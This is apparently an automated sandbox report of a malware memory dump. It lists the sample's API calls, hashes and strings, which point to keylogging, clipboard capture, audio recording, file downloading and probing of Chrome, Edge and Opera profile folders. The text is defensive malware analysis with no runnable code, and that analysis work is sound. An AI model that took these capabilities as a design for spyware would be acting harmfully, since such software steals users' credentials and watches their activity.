                                                                                  • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                  • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                                                  • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                  • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                                                  APIs
                                                                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                                                    • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                  • String ID:
                                                                                  • API String ID: 1761009282-0
                                                                                  • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                  • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                                                  • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                  • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                                                  APIs
                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorHandling__start
                                                                                  • String ID: pow
                                                                                  • API String ID: 3213639722-2276729525
                                                                                  • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                  • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                                                  • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                  • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 1000655C
                                                                                    • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017,100062AB,00000000,?,?,?,?,00000016,?,?,100062B8,00000000,00000000,00000000,00000000,00000000), ref: 100062BE
                                                                                    • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                                    • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                  • String ID: *?$.
                                                                                  • API String ID: 2667617558-3972193922
                                                                                  • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                  • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                                  • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                  • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                                  APIs
                                                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418AF9
                                                                                    • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                                  • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                                                                                    • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                                    • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                  • String ID: image/jpeg
                                                                                  • API String ID: 1291196975-3785015651
                                                                                  • Opcode ID: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                                  • Instruction ID: 4d0b5c8bb5c89928ccad9adfa1773eea8e0f3015d74a4b244142dc53e7d0f70c
                                                                                  • Opcode Fuzzy Hash: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                                  • Instruction Fuzzy Hash: B5316D71604300AFC301EF65C884DAFBBE9EF8A304F00496EF985A7251DB7999048BA6
                                                                                  APIs
                                                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                  • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Init_thread_footer__onexit
                                                                                  • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                  • API String ID: 1881088180-3686566968
                                                                                  • Opcode ID: bc6d6fd555eb74fb66702924759b933dd0787dde42f12c75391812bd244e7e16
                                                                                  • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                                                  • Opcode Fuzzy Hash: bc6d6fd555eb74fb66702924759b933dd0787dde42f12c75391812bd244e7e16
                                                                                  • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                                                  APIs
                                                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ACP$OCP
                                                                                  • API String ID: 0-711371036
                                                                                  • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                  • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                                                  • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                  • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                                                  APIs
                                                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418BE5
                                                                                    • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418C0A
                                                                                    • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                                    • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                  • String ID: image/png
                                                                                  • API String ID: 1291196975-2966254431
                                                                                  • Opcode ID: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                                  • Instruction ID: 3c300d9a249dbea914adbc87700f03e6b767f6cab6163cd9bde1f728fb98d86d
                                                                                  • Opcode Fuzzy Hash: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                                  • Instruction Fuzzy Hash: ED219071204211AFC701AB61CC88CBFBBACEFCA754F10052EF54693261DB399955CBA6
                                                                                  APIs
                                                                                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                                                  Strings
                                                                                  • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LocalTime
                                                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                                                  • API String ID: 481472006-1507639952
                                                                                  • Opcode ID: 1183f192522e4df64eb5f92206734bd19d1223fd61879706f910d0ae6d0fd28e
                                                                                  • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                                                  • Opcode Fuzzy Hash: 1183f192522e4df64eb5f92206734bd19d1223fd61879706f910d0ae6d0fd28e
                                                                                  • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                                                                  APIs
                                                                                  • Sleep.KERNEL32 ref: 0041667B
                                                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DownloadFileSleep
                                                                                  • String ID: !D@
                                                                                  • API String ID: 1931167962-604454484
                                                                                  • Opcode ID: 3ca3873f216e6dec9f51bfba94c2029cd2f9f9141924ab544fb725e976fd1afb
                                                                                  • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                                                                  • Opcode Fuzzy Hash: 3ca3873f216e6dec9f51bfba94c2029cd2f9f9141924ab544fb725e976fd1afb
                                                                                  • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strlen
                                                                                  • String ID: : $Se.
                                                                                  • API String ID: 4218353326-4089948878
                                                                                  • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                  • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                  • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                  • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                  APIs
                                                                                  • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LocalTime
                                                                                  • String ID: | $%02i:%02i:%02i:%03i
                                                                                  • API String ID: 481472006-2430845779
                                                                                  • Opcode ID: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                                                  • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                                                  • Opcode Fuzzy Hash: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                                                  • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                                                  APIs
                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExistsFilePath
                                                                                  • String ID: alarm.wav$hYG
                                                                                  • API String ID: 1174141254-2782910960
                                                                                  • Opcode ID: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                                                                  • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                                                                  • Opcode Fuzzy Hash: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                                                                  • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                                                                  APIs
                                                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                  • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                                                  • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                  • String ID: Online Keylogger Stopped
                                                                                  • API String ID: 1623830855-1496645233
                                                                                  • Opcode ID: 58fc78273637d3a7085363245c614971f3a5c921d027ed369f39b2d39b95462a
                                                                                  • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                                                  • Opcode Fuzzy Hash: 58fc78273637d3a7085363245c614971f3a5c921d027ed369f39b2d39b95462a
                                                                                  • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                                                  APIs
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                    • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                                                  • String ID: Unknown exception
                                                                                  • API String ID: 3476068407-410509341
                                                                                  • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                  • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                  • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                  • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                                                  APIs
                                                                                  • waveInPrepareHeader.WINMM(00A70D08,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                                                                  • waveInAddBuffer.WINMM(00A70D08,00000020,?,00000000,00401A15), ref: 0040185F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: wave$BufferHeaderPrepare
                                                                                  • String ID: XMG
                                                                                  • API String ID: 2315374483-813777761
                                                                                  • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                                  • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                                                  • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                                  • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                                                  APIs
                                                                                  • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LocaleValid
                                                                                  • String ID: IsValidLocaleName$kKD
                                                                                  • API String ID: 1901932003-3269126172
                                                                                  • Opcode ID: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                                                                  • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                                                  • Opcode Fuzzy Hash: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                                                                  • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                                                  APIs
                                                                                  • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExistsFilePath
                                                                                  • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                  • API String ID: 1174141254-4188645398
                                                                                  • Opcode ID: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                                                  • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                                                  • Opcode Fuzzy Hash: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                                                  • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                                                  APIs
                                                                                  • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExistsFilePath
                                                                                  • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                  • API String ID: 1174141254-2800177040
                                                                                  • Opcode ID: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                                                  • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                                                  • Opcode Fuzzy Hash: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                                                  • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                                                  APIs
                                                                                  • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExistsFilePath
                                                                                  • String ID: AppData$\Opera Software\Opera Stable\
                                                                                  • API String ID: 1174141254-1629609700
                                                                                  • Opcode ID: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                                                  • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                                                  • Opcode Fuzzy Hash: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                                                  • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                                                  APIs
                                                                                  • GetKeyState.USER32(00000011), ref: 0040B686
                                                                                    • Part of subcall function 0040A41B: GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A451
                                                                                    • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                                    • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                                                    • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                                                    • Part of subcall function 0040A41B: GetKeyboardState.USER32(?,?,004750F0), ref: 0040A479
                                                                                    • Part of subcall function 0040A41B: ToUnicodeEx.USER32(00475144,00000000,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                                                    • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                  Strings
                                                                                  Memory Dump Source
